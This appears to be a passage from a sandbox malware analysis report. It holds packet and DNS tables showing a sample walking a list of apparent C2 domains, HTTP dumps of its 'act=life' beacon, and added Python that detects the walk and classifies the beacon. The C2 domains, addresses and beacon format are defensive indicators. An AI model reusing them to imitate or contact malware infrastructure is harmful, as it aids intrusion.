                                                                                                                                                        Oct 13, 2024 01:43:28.675865889 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675879002 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.675896883 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675918102 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675939083 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.675951958 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675976992 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.721594095 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804502964 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804553032 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804584026 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804598093 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804630995 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804652929 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811499119 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811562061 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811599016 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811706066 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811716080 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811738014 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811750889 CEST49826443192.168.2.6104.102.49.254
Oct 13, 2024 01:43:28.811774969 CEST | 443 | 49826 | 104.102.49.254 | 192.168.2.6
Oct 13, 2024 01:43:28.811795950 CEST | 49826 | 443 | 192.168.2.6 | 104.102.49.254
Oct 13, 2024 01:43:28.811795950 CEST | 49826 | 443 | 192.168.2.6 | 104.102.49.254
Oct 13, 2024 01:43:28.811805964 CEST | 443 | 49826 | 104.102.49.254 | 192.168.2.6
Oct 13, 2024 01:43:28.811814070 CEST | 443 | 49826 | 104.102.49.254 | 192.168.2.6
Oct 13, 2024 01:43:28.824771881 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:28.824804068 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:28.824999094 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:28.825295925 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:28.825305939 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.332283974 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.332374096 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.334050894 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.334063053 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.334449053 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.336389065 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.336415052 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.336462021 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.470736027 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.470865965 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.470962048 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.470985889 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.471019030 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.471066952 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.471072912 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.471226931 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.471292019 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.471376896 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.471400023 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.471415043 CEST | 49837 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.471420050 CEST | 443 | 49837 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.842771053 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.842813969 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:29.842984915 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.843333006 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:29.843353033 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.337717056 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.337862968 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.339554071 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.339566946 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.339828014 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.340989113 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.341008902 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.341061115 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.773542881 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.773797989 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.773859978 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.773941040 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.773958921 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Oct 13, 2024 01:43:30.773969889 CEST | 49843 | 443 | 192.168.2.6 | 172.67.206.204
Oct 13, 2024 01:43:30.773977041 CEST | 443 | 49843 | 172.67.206.204 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 01:43:18.513829947 CEST | 58498 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:18.526278019 CEST | 53 | 58498 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:19.566415071 CEST | 65205 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:19.578649998 CEST | 53 | 65205 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:20.535904884 CEST | 56776 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:20.544681072 CEST | 53 | 56776 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:20.583271027 CEST | 55186 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:20.595136881 CEST | 53 | 55186 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:21.793998003 CEST | 63346 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:21.803072929 CEST | 53 | 63346 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:22.766633034 CEST | 52725 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:22.779089928 CEST | 53 | 52725 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:23.699707031 CEST | 63862 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:23.711344004 CEST | 53 | 63862 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:24.703291893 CEST | 54019 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:24.714705944 CEST | 53 | 54019 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:25.707037926 CEST | 54466 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:25.719238043 CEST | 53 | 54466 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:27.367120981 CEST | 63029 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:27.376036882 CEST | 53 | 63029 | 1.1.1.1 | 192.168.2.6
Oct 13, 2024 01:43:28.814397097 CEST | 56464 | 53 | 192.168.2.6 | 1.1.1.1
Oct 13, 2024 01:43:28.824029922 CEST | 53 | 56464 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 01:43:18.513829947 CEST | 192.168.2.6 | 1.1.1.1 | 0xaf16 | Standard query (0) | divewanntwj.biz | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:19.566415071 CEST | 192.168.2.6 | 1.1.1.1 | 0xff7 | Standard query (0) | mathcucom.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:20.535904884 CEST | 192.168.2.6 | 1.1.1.1 | 0x684 | Standard query (0) | allocatinow.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:20.583271027 CEST | 192.168.2.6 | 1.1.1.1 | 0xf87b | Standard query (0) | enlargkiw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:21.793998003 CEST | 192.168.2.6 | 1.1.1.1 | 0xac61 | Standard query (0) | resinedyw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:22.766633034 CEST | 192.168.2.6 | 1.1.1.1 | 0xd8e7 | Standard query (0) | vennurviot.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:23.699707031 CEST | 192.168.2.6 | 1.1.1.1 | 0xa1f3 | Standard query (0) | ehticsprocw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:24.703291893 CEST | 192.168.2.6 | 1.1.1.1 | 0x5ea1 | Standard query (0) | condifendteu.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:25.707037926 CEST | 192.168.2.6 | 1.1.1.1 | 0x5815 | Standard query (0) | drawwyobstacw.sbs | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:27.367120981 CEST | 192.168.2.6 | 1.1.1.1 | 0xd013 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:28.814397097 CEST | 192.168.2.6 | 1.1.1.1 | 0xcfdc | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 01:43:18.526278019 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf16 | No error (0) | divewanntwj.biz |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:18.526278019 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf16 | No error (0) | divewanntwj.biz |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:19.578649998 CEST | 1.1.1.1 | 192.168.2.6 | 0xff7 | No error (0) | mathcucom.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:19.578649998 CEST | 1.1.1.1 | 192.168.2.6 | 0xff7 | No error (0) | mathcucom.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:20.544681072 CEST | 1.1.1.1 | 192.168.2.6 | 0x684 | Name error (3) | allocatinow.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:20.595136881 CEST | 1.1.1.1 | 192.168.2.6 | 0xf87b | No error (0) | enlargkiw.sbs |  | 104.21.33.249 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:20.595136881 CEST | 1.1.1.1 | 192.168.2.6 | 0xf87b | No error (0) | enlargkiw.sbs |  | 172.67.152.13 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:21.803072929 CEST | 1.1.1.1 | 192.168.2.6 | 0xac61 | No error (0) | resinedyw.sbs |  | 104.21.77.78 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:21.803072929 CEST | 1.1.1.1 | 192.168.2.6 | 0xac61 | No error (0) | resinedyw.sbs |  | 172.67.205.156 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:22.779089928 CEST | 1.1.1.1 | 192.168.2.6 | 0xd8e7 | No error (0) | vennurviot.sbs |  | 172.67.140.193 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:22.779089928 CEST | 1.1.1.1 | 192.168.2.6 | 0xd8e7 | No error (0) | vennurviot.sbs |  | 104.21.46.170 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:23.711344004 CEST | 1.1.1.1 | 192.168.2.6 | 0xa1f3 | No error (0) | ehticsprocw.sbs |  | 172.67.173.224 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:23.711344004 CEST | 1.1.1.1 | 192.168.2.6 | 0xa1f3 | No error (0) | ehticsprocw.sbs |  | 104.21.30.221 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:24.714705944 CEST | 1.1.1.1 | 192.168.2.6 | 0x5ea1 | No error (0) | condifendteu.sbs |  | 104.21.79.35 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:24.714705944 CEST | 1.1.1.1 | 192.168.2.6 | 0x5ea1 | No error (0) | condifendteu.sbs |  | 172.67.141.136 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:25.719238043 CEST | 1.1.1.1 | 192.168.2.6 | 0x5815 | No error (0) | drawwyobstacw.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:25.719238043 CEST | 1.1.1.1 | 192.168.2.6 | 0x5815 | No error (0) | drawwyobstacw.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:27.376036882 CEST | 1.1.1.1 | 192.168.2.6 | 0xd013 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:28.824029922 CEST | 1.1.1.1 | 192.168.2.6 | 0xcfdc | No error (0) | sergei-esenin.com |  | 172.67.206.204 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:43:28.824029922 CEST | 1.1.1.1 | 192.168.2.6 | 0xcfdc | No error (0) | sergei-esenin.com |  | 104.21.53.8 | A (IP address) | IN (0x0001) | false
• divewanntwj.biz
• mathcucom.sbs
• enlargkiw.sbs
• resinedyw.sbs
• vennurviot.sbs
• ehticsprocw.sbs
• condifendteu.sbs
• drawwyobstacw.sbs
• steamcommunity.com
• sergei-esenin.com
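The DNS tables above show the sample walking a list of candidate C2 domains one lookup per second (nine distinct names, one NXDOMAIN, the rest fronted by Cloudflare ranges) before it touches steamcommunity.com and sergei-esenin.com. The following Python is an added example, not part of the Joe Sandbox report: a sliding-window heuristic that flags this "fallback-list walk" in a DNS query log and emits the resolved addresses as an IOC list. It works over any client and any window, not just this capture. QUERIES is transcribed from the query and answer tables; the 8-second window, the five-domain threshold and the two-label registrable-domain approximation are assumptions chosen for this capture, not tuned production rules.

```python
"""Heuristic for a C2 fallback-list walk in DNS query logs.

Added example, not part of the sandbox report. QUERIES is transcribed
from the report's DNS query and answer tables; the 8-second window, the
five-domain threshold and the two-label registrable-domain approximation
are assumptions chosen for this capture, not tuned production rules.
"""
import json
from collections import defaultdict
from datetime import datetime

# (timestamp CEST, client, queried name, reply code, answer addresses), from the report
QUERIES = [
    ("2024-10-13 01:43:18.513", "192.168.2.6", "divewanntwj.biz", "NOERROR", ["188.114.97.3", "188.114.96.3"]),
    ("2024-10-13 01:43:19.566", "192.168.2.6", "mathcucom.sbs", "NOERROR", ["188.114.97.3", "188.114.96.3"]),
    ("2024-10-13 01:43:20.535", "192.168.2.6", "allocatinow.sbs", "NXDOMAIN", []),
    ("2024-10-13 01:43:20.583", "192.168.2.6", "enlargkiw.sbs", "NOERROR", ["104.21.33.249", "172.67.152.13"]),
    ("2024-10-13 01:43:21.793", "192.168.2.6", "resinedyw.sbs", "NOERROR", ["104.21.77.78", "172.67.205.156"]),
    ("2024-10-13 01:43:22.766", "192.168.2.6", "vennurviot.sbs", "NOERROR", ["172.67.140.193", "104.21.46.170"]),
    ("2024-10-13 01:43:23.699", "192.168.2.6", "ehticsprocw.sbs", "NOERROR", ["172.67.173.224", "104.21.30.221"]),
    ("2024-10-13 01:43:24.703", "192.168.2.6", "condifendteu.sbs", "NOERROR", ["104.21.79.35", "172.67.141.136"]),
    ("2024-10-13 01:43:25.707", "192.168.2.6", "drawwyobstacw.sbs", "NOERROR", ["188.114.96.3", "188.114.97.3"]),
    ("2024-10-13 01:43:27.367", "192.168.2.6", "steamcommunity.com", "NOERROR", ["104.102.49.254"]),
    ("2024-10-13 01:43:28.814", "192.168.2.6", "sergei-esenin.com", "NOERROR", ["172.67.206.204", "104.21.53.8"]),
]


def registrable(name: str) -> str:
    """Approximate the registrable domain as the last two labels.

    Assumption: adequate for .biz/.sbs/.com; multi-label public suffixes
    (co.uk, com.au) need a public suffix list instead.
    """
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")


def find_fallback_walks(queries, window_s=8.0, min_domains=5):
    """Flag clients that query at least min_domains distinct registrable
    domains inside a window_s-second sliding window.

    Returns the densest such run per client: the domains in query order,
    the NXDOMAIN misses, and the union of answer addresses (the IOC list).
    """
    by_client = defaultdict(list)
    for ts, client, name, rcode, addrs in queries:
        by_client[client].append((parse_ts(ts), registrable(name), rcode, addrs))

    findings = []
    for client, rows in by_client.items():
        rows.sort(key=lambda r: r[0])
        best = []
        for i, row in enumerate(rows):
            t0 = row[0]
            run = [r for r in rows[i:] if (r[0] - t0).total_seconds() <= window_s]
            # keep the earliest run with the most distinct domains
            if len({r[1] for r in run}) > len({r[1] for r in best}):
                best = run
        domains = list(dict.fromkeys(r[1] for r in best))  # ordered, de-duplicated
        if len(domains) < min_domains:
            continue
        findings.append({
            "client": client,
            "start": best[0][0].isoformat(sep=" "),
            "domains": domains,
            "nxdomain": [r[1] for r in best if r[2] == "NXDOMAIN"],
            "addresses": sorted({a for r in best for a in r[3]}),
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(find_fallback_walks(QUERIES), indent=2))
```

On the transcribed data the 8-second window isolates exactly the nine candidate names and leaves steamcommunity.com and sergei-esenin.com outside the run; widening the window past 10 seconds pulls them in, which is the usual trade-off between catching a slower walker and tagging the legitimate lookups that follow it. The run is evaluated per client, so a resolver log with many hosts produces one finding per host that matches.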
Timestamps in the HTTP session dumps below are UTC, whereas the packet and DNS tables above are in CEST (UTC+2): 23:43:19 UTC here is 01:43:19 CEST there.

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | 3784 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:43:19 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: divewanntwj.biz
2024-10-12 23:43:19 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-12 23:43:19 UTC | 819 | IN | HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 23:43:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j0to4qdfgh87nlt1h2vfd43ml2; expires=Wed, 05 Feb 2025 17:29:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANGLZ7qiqKXtsBGm2FARb3ZQbVVdfQhhi4LDgSsBV9p6NidLa7ALCqxSgcdcvR3DiqEUv%2F8fd6XybJ%2Bmi16MdTiUd88uvlv4zQArtSvtBoeDdmO9sK5rGt2A5qIr7sOB74k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1af390bd2142ef-EWR
alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:19 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: a\r\nerror #D12\r\n (chunked transfer encoding: "a" is the chunk-size line, 0xa = 10 bytes, followed by the payload "error #D12")
2024-10-12 23:43:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n (zero-length terminating chunk; the decoded response body is just "error #D12")
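Session 0 is the whole beacon in one round trip: a 262-byte POST to /api whose only form field is act=life, answered with a chunked reply whose decoded body is "error #D12". The following Python is an added example, not part of the Joe Sandbox report: it parses that exchange from raw bytes, reassembles the chunked body (the "a" / "0" lines the Ascii dump shows are chunk sizes, not content) and scores the request against the traits visible here. REQUEST and RESPONSE are transcribed from session 0 (the response headers are abridged to the ones the parser needs); BENIGN_REQUEST is constructed; the indicator names, the "error #..." reply pattern and the beacon verdict are this example's own generalisation from a single capture.

```python
"""Parse one captured LummaC-style beacon and decode its chunked reply.

Added example, not part of the sandbox report. REQUEST and RESPONSE are
transcribed from HTTP session 0 (response headers abridged); BENIGN_REQUEST
is constructed. Indicator names, the 'error #...' reply pattern and the
beacon verdict are this example's own generalisation from one capture.
"""
import json
import re
from urllib.parse import parse_qs

# User-Agent exactly as sent in the capture (a stock Chrome 119 string)
CHROME_119_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# 262 header bytes + 8 body bytes, matching the two OUT records of session 0
REQUEST = b"\r\n".join([
    b"POST /api HTTP/1.1",
    b"Connection: Keep-Alive",
    b"Content-Type: application/x-www-form-urlencoded",
    b"User-Agent: " + CHROME_119_UA.encode(),
    b"Content-Length: 8",
    b"Host: divewanntwj.biz",
    b"",
    b"act=life",
])

# abridged headers, then the two IN data records: chunk "a"/payload and "0" terminator
RESPONSE = b"\r\n".join([
    b"HTTP/1.1 200 OK",
    b"Date: Sat, 12 Oct 2024 23:43:19 GMT",
    b"Content-Type: text/html; charset=UTF-8",
    b"Transfer-Encoding: chunked",
    b"Connection: close",
    b"Server: cloudflare",
    b"",
    b"a",            # chunk size 0xa = 10 bytes
    b"error #D12",   # chunk data
    b"0",            # zero-length terminating chunk
    b"",
    b"",
])

# constructed negative case: same UA, ordinary GET, no form body
BENIGN_REQUEST = b"\r\n".join([
    b"GET /index.html HTTP/1.1",
    b"Host: example.com",
    b"User-Agent: " + CHROME_119_UA.encode(),
    b"",
    b"",
])


def split_message(raw: bytes):
    """Split an HTTP/1.1 message into (start line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; raises on a truncated stream."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated chunked body")
        size = int(body[pos:end].split(b";")[0], 16)  # drop any chunk extension
        pos = end + 2
        if size == 0:
            return bytes(out)
        if len(body) < pos + size + 2:
            raise ValueError("truncated chunk data")
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that follows the chunk data


def classify_exchange(request: bytes, response: bytes) -> dict:
    """Score one request/response pair against the traits seen in session 0."""
    req_line, req_h, req_body = split_message(request)
    method, path, _ = req_line.split(" ", 2)
    form = parse_qs(req_body.decode("latin-1"))
    status_line, resp_h, resp_body = split_message(response)
    if resp_h.get("transfer-encoding", "").lower() == "chunked":
        resp_body = decode_chunked(resp_body)
    body_text = resp_body.decode("latin-1")
    indicators = {
        "post_to_api": method == "POST" and path == "/api",
        "act_life_form": form.get("act") == ["life"],
        "chrome_119_ua": req_h.get("user-agent") == CHROME_119_UA,
        "tiny_declared_body": req_h.get("content-length") == str(len(req_body)) and len(req_body) <= 16,
        "error_code_reply": re.fullmatch(r"error #[A-Z0-9]+", body_text) is not None,
    }
    return {
        "host": req_h.get("host"),
        "status": status_line.split(" ", 2)[1],
        "body": body_text,
        "indicators": indicators,
        # verdict rests on the request shape; the UA alone is a normal Chrome string
        "beacon": indicators["post_to_api"] and indicators["act_life_form"],
    }


if __name__ == "__main__":
    print(json.dumps(classify_exchange(REQUEST, RESPONSE), indent=2))
```

The verdict deliberately ignores the User-Agent: the string is a stock Chrome 119 value and will match a great deal of legitimate traffic, so it is recorded as supporting context only. The request shape (POST /api, an 8-byte act=life form body) is what distinguishes the beacon, and the decoded "error #D12" reply is useful for confirming which servers are answering as C2 rather than as parked hosts.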


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49774        188.114.97.3    443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes  Direction  Data
2024-10-12 23:43:20 UTC  260    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: mathcucom.sbs
2024-10-12 23:43:20 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-10-12 23:43:20 UTC  825    IN         HTTP/1.1 200 OK
                                           Date: Sat, 12 Oct 2024 23:43:20 GMT
                                           Content-Type: text/html; charset=UTF-8
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=nll1hfd8gpas51cgq0b8br4pba; expires=Wed, 05 Feb 2025 17:29:59 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           cf-cache-status: DYNAMIC
                                           vary: accept-encoding
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJLj3FsseP5k4dXFR22%2BbFldrOZjD%2BZJw8ho%2FyWPvRz5w%2FKD%2BnbV6Ls9%2Ba5uJdSoYR3NXj0i5UU3aJvtuEeUt8CMXMqF1vLFhXQpHRrwxXo6t%2F8lQ%2F5ebSJrNlzu1Mix"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d1af396dc022369-EWR
                                           alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:20 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                           Data Ascii: aerror #D12
2024-10-12 23:43:20 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49780        104.21.33.249   443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes  Direction  Data
2024-10-12 23:43:21 UTC  260    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: enlargkiw.sbs
2024-10-12 23:43:21 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-10-12 23:43:21 UTC  817    IN         HTTP/1.1 200 OK
                                           Date: Sat, 12 Oct 2024 23:43:21 GMT
                                           Content-Type: text/html; charset=UTF-8
